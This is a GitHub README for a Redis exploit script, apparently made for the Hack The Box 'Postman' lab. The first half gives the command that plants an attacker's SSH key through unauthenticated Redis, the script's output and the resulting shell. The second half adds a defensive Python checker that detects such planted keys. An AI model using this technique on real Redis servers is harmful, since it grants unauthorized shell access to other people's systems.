bascoe10/RedisExploit

REDIS EXPLOIT

SSH EXPLOIT

This exploit puts an SSH key in any home directory that Redis has access to. The script generates an SSH key pair every time it is executed. The private key, saved as private.pem, is used to SSH to the host. The example below demonstrates this exploit with the HTB Postman VM.

This was inspired by Avinash-acid and HackTricks.

DISCLAIMER

This exploit is meant strictly for educational purposes.

Example

root@kali:~/HTB/Postman/RedisExploit# python ssh_exploit.py 10.10.10.160 /var/lib/redis/.ssh
Namespace(host='10.10.10.160', ssh_dir='/var/lib/redis/.ssh')
Key pairs generated
Redis flushed
public key added to redis
Home directory set
DB filename changed
Setting saved
Done
root@kali:~/HTB/Postman/RedisExploit# ssh redis@10.10.10.160 -i private.pem 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

redis@Postman:~$ 
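For triage on a host like this one, the following added example (not part of this repository) inspects the raw bytes of an authorized_keys file. It assumes the Redis database file saved in the "DB filename changed" and "Setting saved" steps is the account's authorized_keys, so the file begins with the RDB header instead of plain key lines; the function names and both samples are constructed for illustration.

```python
import base64, binascii, hashlib, re

RDB_MAGIC = re.compile(rb"REDIS\d{4}")  # every RDB dump starts with this header
KEY = re.compile(rb"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d{3}) ([A-Za-z0-9+/]+={0,2})")

def fingerprint(blob: bytes):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob, or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
    digest = base64.b64encode(hashlib.sha256(raw).digest()).rstrip(b"=")
    return "SHA256:" + digest.decode()

def inspect_authorized_keys(data: bytes) -> dict:
    """Classify raw authorized_keys bytes and list the keys found inside."""
    # Control or non-ASCII bytes never belong in a text authorized_keys file.
    binary = sum(1 for b in data if b not in (9, 10, 13) and not 32 <= b <= 126)
    if RDB_MAGIC.match(data):
        verdict = "rdb-dump"
    elif binary:
        verdict = "binary-content"
    else:
        verdict = "text"
    # Fingerprints can be matched against "Accepted publickey" lines in sshd logs.
    keys = [(m.group(1).decode(), fingerprint(m.group(2))) for m in KEY.finditer(data)]
    return {"verdict": verdict, "binary_bytes": binary, "keys": keys}

# Constructed samples (not taken from a real host or a real Redis dump).
BLOB = base64.b64encode(b"constructed-key-material-for-demo")
CLEAN = b"ssh-ed25519 " + BLOB + b" admin@example\n"
PLANTED = (b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x03key\x40\x40"
           b"\n\nssh-rsa " + BLOB + b" constructed@example\n\n\xff" + bytes(8))

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("planted", PLANTED)):
        print(name, inspect_authorized_keys(sample))
```

A verdict other than "text" on any account's authorized_keys, and especially on the Redis service account's, is worth escalating; on the Redis side, requiring authentication and keeping the service off untrusted networks removes the precondition.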
